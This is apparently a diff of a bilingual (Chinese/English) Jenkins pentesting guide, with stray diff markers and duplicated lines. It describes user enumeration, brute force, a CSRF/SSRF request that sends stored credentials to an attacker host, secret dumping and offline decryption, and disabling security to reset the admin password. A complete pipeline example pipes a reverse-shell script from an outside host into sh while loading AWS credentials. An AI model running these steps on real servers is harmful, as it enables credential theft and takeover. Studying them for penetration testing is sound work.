Jenkins 是一个工具,提供了一种简便的方法来为几乎任何编程语言和源代码仓库的组合建立持续集成或持续交付 (CI/CD) 环境,使用 pipelines。此外它能够自动化各种常规开发任务。虽然 Jenkins 并不能免除为各个步骤编写脚本的需要,但它确实比手动搭建更快速、更稳健地将整个构建、测试和部署工具链集成在一起。
Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
{{#ref}}
basic-jenkins-information.md
{{#endref}}
## 无需身份验证的枚举
## Unauthenticated Enumeration
In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
为了在未认证的情况下搜索有趣的 Jenkins 页面(例如 _/people__/asynchPeople_,这些会列出当前用户),你可以使用:
```
msf> use auxiliary/scanner/http/jenkins_enum
```
检查是否可以在不需要身份验证的情况下执行命令:
Check if you can execute commands without needing authentication:
```
msf> use auxiliary/scanner/http/jenkins_command
```
在没有凭证的情况下,你可以查看路径 _**/asynchPeople/**__**/securityRealm/user/admin/search/index?q=**_ 来寻找 **用户名**
你可能可以从路径 _**/oops**__**/error**_ 获取 Jenkins 版本信息。
Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
![](<../../images/image (146).png>)
### 已知漏洞
### Known Vulnerabilities
{{#ref}}
https://github.com/gquere/pwn_jenkins
{{#endref}}
## 登录
## Login
在基本信息中,你可以检查 **所有在 Jenkins 中的登录方式**
In the basic information you can check **all the ways to login inside Jenkins**:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
### 注册
### Register
你可能会发现允许你创建账户并登录的 Jenkins 实例。就这么简单。
You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
### **SSO Login**
如果存在 **SSO** 功能/插件,你应尝试使用测试账号(例如测试 **Github/Bitbucket account**)登录该应用。Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
### Bruteforce
**Jenkins** 缺乏 **密码策略** **用户名 brute-force 缓解**。进行 **brute-force** 针对用户是必要的,因为可能使用 **弱密码** **用户名作为密码**,甚至 **反转的用户名作为密码**
**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
```
msf> use auxiliary/scanner/http/jenkins_login
```
### Password spraying
使用 [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
### IP Whitelisting Bypass
许多组织将 **SaaS-based source control management (SCM) systems**(例如 GitHub GitLab)与像 Jenkins 或 TeamCity 这样的 **internal, self-hosted CI** 解决方案结合使用。该配置允许 CI 系统 **receive webhook events from SaaS source control vendors**,主要用于触发 pipeline jobs
Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
为此,组织会将 **SCM platforms** **IP ranges** 列入 **whitelist**,允许它们通过 **webhooks** 访问 **internal CI system**。然而,值得注意的是,**anyone** 可以在 GitHub GitLab 上创建 **account** 并配置以 **trigger a webhook**,从而可能向 **internal CI system** 发送请求。
To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
参见: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
## Internal Jenkins Abuses
在这些情形中,我们假设你有一个有效的账户可以访问 Jenkins
In these scenarios we are going to suppose you have a valid account to access Jenkins.
> [!WARNING]
> 根据 Jenkins 中配置的 **Authorization** 机制以及被攻陷用户的权限,你 **可能能够或无法执行以下攻击。**
> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
有关更多信息,请查看基本信息:
For more information check the basic information:
{{#ref}}
basic-jenkins-information.md
@@ -81,49 +87,35 @@ basic-jenkins-information.md
### Listing users
如果你已经访问了 Jenkins你可以在 [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) 列出其他注册用户。
If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
### Dumping builds to find cleartext secrets
使用 [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) 导出 build console outputs build environment variables,以期发现 cleartext secrets
Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
```bash
python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v
```
### FormValidation/TestConnection endpoints (CSRF to SSRF/credential theft)
一些插件在类似 `/descriptorByName/<Class>/testConnection` 的路径下暴露 Jelly 的 `validateButton``test connection` 处理程序。 当处理程序 **不强制要求 POST 或进行权限检查** 时,你可以:
- 将 POST 改为 GET 并去掉 Crumb 以绕过 CSRF 检查。
- 如果不存在 `Jenkins.ADMINISTER` 检查,可以以低权限/匿名身份触发该处理程序。
- 对管理员发起 CSRF并替换 host/URL 参数以 exfiltrate credentials 或触发出站调用。
- 使用响应错误(例如 `ConnectException`)作为 SSRF/port-scan oracle。
示例 GET无 Crumb将验证调用变为 SSRF/credential exfiltration
```http
GET /descriptorByName/jenkins.plugins.openstack.compute.JCloudsCloud/testConnection?endPointUrl=http://attacker:4444/&credentialId=openstack HTTP/1.1
Host: jenkins.local:8080
```
If the plugin reuses stored creds, Jenkins will attempt to authenticate to `attacker:4444` and may leak identifiers or errors in the response. See: https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/
### **Stealing SSH Credentials**
如果被攻陷的用户拥有 **enough privileges to create/modify a new Jenkins node**,并且已经存有用于访问其他节点的 SSH 凭据,他可以通过创建/修改一个节点并**设置一个不会验证 host key 的主机来记录这些凭据**,从而 **steal those credentials**
If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
![](<../../images/image (218).png>)
通常你会在 **global provider** (`/credentials/`) 中找到 Jenkins SSH 凭据,所以你也可以像 dump 其他 secret 那样导出它们。更多信息见 [**Dumping secrets section**](#dumping-secrets).
You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](#dumping-secrets).
### **RCE in Jenkins**
获取 Jenkins 服务器的 **shell** 会使攻击者有机会 leak 所有的 **secrets** **env variables**,并去 **exploit other machines** 位于同一网络,甚至 **gather cloud credentials**
Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
默认情况下Jenkins 会以 SYSTEM 运行。因此,攻破它会赋予攻击者 SYSTEM 权限。
By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
### **RCE Creating/Modifying a project**
Creating/Modifying a project 是获得 Jenkins 服务器 RCE 的一种方式:
Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
{{#ref}}
jenkins-rce-creating-modifying-project.md
@@ -131,7 +123,7 @@ jenkins-rce-creating-modifying-project.md
### **RCE Execute Groovy script**
你也可以通过执行 Groovy script 来获得 RCE这可能比创建新项目更隐蔽
You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
{{#ref}}
jenkins-rce-with-groovy-script.md
@@ -139,7 +131,7 @@ jenkins-rce-with-groovy-script.md
### RCE Creating/Modifying Pipeline
你也可以通过创建/修改 pipeline 来获得 **RCE**
You can also get **RCE by creating/modifying a pipeline**:
{{#ref}}
jenkins-rce-creating-modifying-pipeline.md
@@ -147,161 +139,173 @@ jenkins-rce-creating-modifying-pipeline.md
## Pipeline Exploitation
exploit pipelines,你仍然需要访问 Jenkins
To exploit pipelines you still need to have access to Jenkins.
### Build Pipelines
**Pipelines** 也可以被用作项目中的 **build mechanism**,在这种情况下可以配置仓库内的一个 **file inside the repository** 来包含 pipeline 语法。默认使用 `/Jenkinsfile`
**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
![](<../../images/image (127).png>)
也可以将 **store pipeline configuration files in other places**(例如在其他仓库中),目的是 **separating** repository **access** pipeline access
It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
如果攻击者对该文件有 **write access over that file**,他将能够 **modify** 它并 **potentially trigger** pipeline,甚至无需访问 Jenkins 即可触发。\
攻击者可能需要 **bypass some branch protections**(这取决于平台和用户权限,可能能或不能被绕过)。
If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
最常见的触发自定义 pipeline 的方式有:
The most common triggers to execute a custom pipeline are:
- **Pull request** to the main branch (or potentially to other branches)
- **Push to the main branch** (or potentially to other branches)
- **Update the main branch** and wait until it's executed somehow
> [!NOTE]
> 如果你是一个 **external user**,你不应该期望能够对其他用户/组织的仓库创建一个 **PR to the main branch** 并 **trigger the pipeline**……但如果配置不当,你可能仅通过利用这一点就能完全 **compromise companies**
> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
### Pipeline RCE
在前面的 RCE 部分已经指出了一种 [**get RCE modifying a pipeline**](#rce-creating-modifying-pipeline) 的技术。
In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](#rce-creating-modifying-pipeline).
### Checking Env variables
可以为整个 pipeline 或特定 stage 声明 **clear text env variables**。这些 env variables **shouldn't contain sensitive info**,但攻击者始终可以 **check all the pipeline** 配置/Jenkinsfiles
It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
```bash
pipeline {
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
```
### Dumping secrets
有关 Jenkins 通常如何处理 secrets 的信息,请查看基础信息:
For information about how are secrets usually treated by Jenkins check out the basic information:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
凭证可以**限定到全局提供者**`/credentials/`)或**特定项目**`/job/<project-name>/configure`)。因此,要想 exfiltrate 所有凭证,你至少需要**攻破所有包含 secrets 的项目**并执行自定义/被投毒的 pipelines
Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job/<project-name>/configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
还有一个问题:为了在 pipeline 的 env 中得到一个 **secret**,你需要**知道该 secret 的名称和类型**。例如,如果你尝试将一个 **`usernamePassword`** 类型的 **secret** 当作 **`string`** 类型的 **secret****load**,你会得到如下 **错误**
```
ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
```
下面是加载一些常见 secret 类型的方法:
Here you have the way to load some common secret types:
```bash
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
sh '''
env #Search for USERNAME and PASS
'''
sh '''
env #Search for USERNAME and PASS
'''
}
withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
sh '''
env #Search for SECRET
'''
sh '''
env #Search for SECRET
'''
}
withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
sh '''
env # Search for USERPASS
'''
sh '''
env # Search for USERPASS
'''
}
# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
}
```
在此页面末尾你可以**找到所有凭证类型**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
> [!WARNING]
> 最好的方法是通过 **dump all the secrets at once**,即通过 **compromising** **Jenkins** 机器(例如在 **built-in node** 上运行一个 **reverse shell**),然后 **leaking** **master keys** **encrypted secrets** 并在 offline 解密。\
> 更多关于如何做到这一点的信息见 [Nodes & Agents section](#nodes-and-agents) 和在 [Post Exploitation section](#post-exploitation)
> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
> More on how to do this in the [Nodes & Agents section](#nodes-and-agents) and in the [Post Exploitation section](#post-exploitation).
### 触发器
### Triggers
来自 [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): `triggers` directive 定义了 Pipeline 应该被重新触发的**自动方式**。对于与 GitHub BitBucket 等源集成的 Pipelines`triggers` 可能不是必需的,因为基于 webhooks 的集成很可能已经存在。当前可用的触发器有 `cron``pollSCM` `upstream`
From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
Cron example:
Cron 示例:
```bash
triggers { cron('H */4 * * 1-5') }
```
Check **文档中的其他示例**
Check **other examples in the docs**.
### Nodes & Agents
一个 **Jenkins 实例** 可能在不同的机器上运行 **不同的 agents**。从攻击者角度来看,访问不同的机器意味着可能窃取到**不同的云凭证**,或者获得可被滥用以攻击其他机器的**不同网络访问权限**。
A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines.
更多信息请查看基础信息:
For more information check the basic information:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
你可以在 `/computer/` 列举 **已配置的节点**,通常你会看到 **`Built-In Node`**(即运行 Jenkins 的节点),以及可能的其他节点:
You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
![](<../../images/image (249).png>)
**攻陷 Built-In node** 特别有价值,因为它包含敏感的 Jenkins 信息。
It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
要指定在 **built-in Jenkins node****run****pipeline**,可以在 pipeline 中指定以下配置:
```bash
pipeline {
agent {label 'built-in'}
agent {label 'built-in'}
```
### 完整示例
在特定 agent 上的 Pipeline带有 cron trigger包含 pipeline 和 stage env variables在一个 step 中加载 2 个变量并发送 reverse shell
### Complete example
Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
```bash
pipeline {
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}
post {
always {
cleanWs()
}
}
post {
always {
cleanWs()
}
}
}
```
## Arbitrary File Read to RCE
{{#ref}}
@@ -325,37 +329,40 @@ jenkins-rce-creating-modifying-pipeline.md
## Post Exploitation
### Metasploit
```
msf> post/multi/gather/jenkins_gather
```
### Jenkins 机密
你可以通过访问 `/credentials/` 列出这些机密(如果你有足够的权限)。请注意,这只会列出 `credentials.xml` 文件中的机密,但**构建配置文件**可能也包含**更多凭证**。
### Jenkins Secrets
如果你能**查看每个项目的配置**,也可以在其中看到用于访问仓库的**凭证secrets的名称**以及**项目的其他凭证**。
You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
![](<../../images/image (180).png>)
#### Groovy
#### From Groovy
{{#ref}}
jenkins-dumping-secrets-from-groovy.md
{{#endref}}
#### 从磁盘
#### From disk
要**解密 Jenkins secrets**,需要以下文件:
These files are needed to **decrypt Jenkins secrets**:
- secrets/master.key
- secrets/hudson.util.Secret
此类**机密通常可以在以下位置找到**
Such **secrets can usually be found in**:
- credentials.xml
- jobs/.../build.xml
- jobs/.../config.xml
下面是一个用于查找它们的正则表达式:
Here's a regex to find them:
```bash
# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
@@ -365,9 +372,11 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>
```
#### 离线解密 Jenkins secrets
如果你已经导出了 **解密这些 secrets 所需的密码**,使用 [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **来解密这些 secrets**
#### Decrypt Jenkins secrets offline
If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
```bash
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
@@ -375,20 +384,23 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
```
#### 从 Groovy 解密 Jenkins secrets
#### Decrypt Jenkins secrets from Groovy
```bash
println(hudson.util.Secret.decrypt("{...}"))
```
### 创建新的 admin user
1. 访问 Jenkins 的 config.xml 文件,路径为 `/var/lib/jenkins/config.xml``C:\Program Files (x86)\Jenkis\`
2. 查找 `<useSecurity>true</useSecurity>` 并将 **`true`** 更改为 **`false`**。
1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
3. **重启** **Jenkins** 服务器:`service jenkins restart`
4. 现在再次访问 Jenkins 门户,**Jenkins will not ask any credentials**。导航到 "**Manage Jenkins**" 来重新设置 **administrator password**
5. 通过将设置改回 `<useSecurity>true</useSecurity>` **启用** **security**,并**再次重启 Jenkins**。
### Create new admin user
## 参考资料
1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
2. Search for the word `<useSecurity>true</useSecurity>`and change the word \*\*`true` \*\* to **`false`**.
1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
3. **Restart** the **Jenkins** server: `service jenkins restart`
4. Now go to the Jenkins portal again and **Jenkins will not ask any credentials** this time. You navigate to "**Manage Jenkins**" to set the **administrator password again**.
5. **Enable** the **security** again by changing settings to `<useSecurity>true</useSecurity>` and **restart the Jenkins again**.
## References
- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
@@ -398,3 +410,6 @@ println(hudson.util.Secret.decrypt("{...}"))
- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -6,48 +6,48 @@
### Username + Password
在 Jenkins 中最常见的登录方式是使用用户名或密码
The most common way to login in Jenkins if with a username or a password
### Cookie
如果一个 **authorized cookie gets stolen**,它可以用来访问该用户的会话。该 cookie 通常称为 `JSESSIONID.*`。(用户可以终止他所有的会话,但他首先需要发现 cookie 被盗。)
If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
### SSO/Plugins
Jenkins 可以通过 plugins 配置为 **通过第三方 SSO 访问**
Jenkins can be configured using plugins to be **accessible via third party SSO**.
### Tokens
**Users can generate tokens** 来允许应用以他们的身份通过 CLI REST API 访问。
**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
### SSH Keys
该组件为 Jenkins 提供了内置的 SSH server。它是 [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/) 的一种替代接口,可以使用任意 SSH 客户端以这种方式调用命令。(摘自 [docs](https://plugins.jenkins.io/sshd/)
This component provides a built-in SSH server for Jenkins. Its an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
## Authorization
`/configureSecurity` 中可以 **配置 Jenkins 的授权方法**。有几种选项:
In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
- **Anyone can do anything**:即使是 anonymous 访问也可以管理服务器
- **Legacy mode**:与 Jenkins <1.164 相同。如果你有 **"admin" role**,你将被授予对系统的 **full control**,否则(包括 **anonymous** 用户)你将只有 **read** 访问权限。
- **Logged-in users can do anything**:在此模式下,所有 **已登录用户都获得 Jenkins 的 full control**。唯一不会拥有 full control 的用户是 **anonymous user**,其仅具有 **read access**
- **Matrix-based security**:你可以在一个表格中配置 **谁可以做什么**。每一 **列** 代表一个 **permission**。每一 **行** 代表一个 **user group/role**。这包括一个特殊用户 '**anonymous**',代表 **未认证用户**,以及 '**authenticated**',代表 **所有已认证用户**
- **Anyone can do anything**: Even anonymous access can administrate the server
- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
![](<../../images/image (149).png>)
- **Project-based Matrix Authorization Strategy:** 此模式是对 "**Matrix-based security**" 的扩展,允许为每个项目单独 **定义额外的 ACL 矩阵。**
- **Role-Based Strategy:** 允许使用 **基于角色的策略** 来定义授权。在 `/role-strategy` 管理这些角色。
- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
## **Security Realm**
`/configureSecurity` 中可以 **配置 security realm** 默认情况下 Jenkins 支持几种不同的 Security Realms
In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
- **Delegate to servlet container**:用于 **将认证委托给运行 Jenkins controller 的 servlet container**,例如 [Jetty](https://www.eclipse.org/jetty/)
- **Jenkins own user database:** 使用 **Jenkins 内置的用户数据存储** 进行认证,而不是委托给外部系统。此项默认启用。
- **LDAP**:将所有认证委托给已配置的 LDAP server包括用户和组。
- **Unix user/group database****将认证委托给 Jenkins controller 所在主机的底层 Unix** 操作系统级别用户数据库。此模式还允许重用 Unix 组来做授权。
- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
- **Jenkins own user database:** Use **Jenkinss own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
Plugins 可以提供额外的 security realms对于将 Jenkins 整合进现有身份系统可能很有用,例如:
Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
- [Active Directory](https://plugins.jenkins.io/active-directory)
- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
@@ -57,42 +57,31 @@ Plugins 可以提供额外的 security realms对于将 Jenkins 整合进现
Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
**Nodes** 是运行 build **agents****机器**Jenkins 监控每个已连接节点的磁盘空间、可用临时空间、可用 swap、时钟时间/同步和响应时间。如果这些值中的任何一个超出配置阈值,则节点会被下线。
**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
**Agents** 通过 **使用 executors** 代表 Jenkins controller **管理任务执行**。agent 可以使用任何支持 Java 的操作系统。构建和测试所需的工具安装在 agent 运行的节点上;它们可以 **直接安装或在容器中**Docker Kubernetes)。每个 **agent 在宿主机上本质上是一个具有自己 PID 的进程**
**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
**executor** 是用于执行任务的 **槽位**;本质上,它是 **agent 中的一个线程**。一个节点上的 **executor 数量** 定义了该节点一次可以并发执行的 **任务数量**。换句话说,这决定了在该节点上一次可以并发执行的 Pipeline `stages` 的数量。
An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
## Jenkins Secrets
### Encryption of Secrets and Credentials
Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins 使用 **AES 来加密和保护 secretscredentials 及其各自的加密密钥**。这些加密密钥与用于保护这些密钥的 master key 一起存储在 `$JENKINS_HOME/secrets/`。应该配置该目录,使得只有运行 Jenkins controller 的操作系统用户对该目录具有读写权限(即 `chmod` 值为 `0700` 或使用适当的文件属性)。**master key**(在加密术语中有时称为 "key encryption key")以**未加密**形式存储在 Jenkins controller 的文件系统中,位于 **`$JENKINS_HOME/secrets/master.key`**,这并不能防止直接访问该文件的攻击者。大多数用户和开发者会通过 [Secret](https://javadoc.jenkins.io/byShortName/Secret) API 来间接使用这些加密密钥以加密通用 secret 数据,或通过 credentials API。对于喜欢研究加密的读者Jenkins 使用 AES cipher block chaining (CBC) 模式下,带 PKCS#5 padding 和随机 IVs加密存储在 `$JENKINS_HOME/secrets/` 中的 [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) 实例,文件名对应其 `CryptoConfidentialKey` id。常见的 key ids 包括:
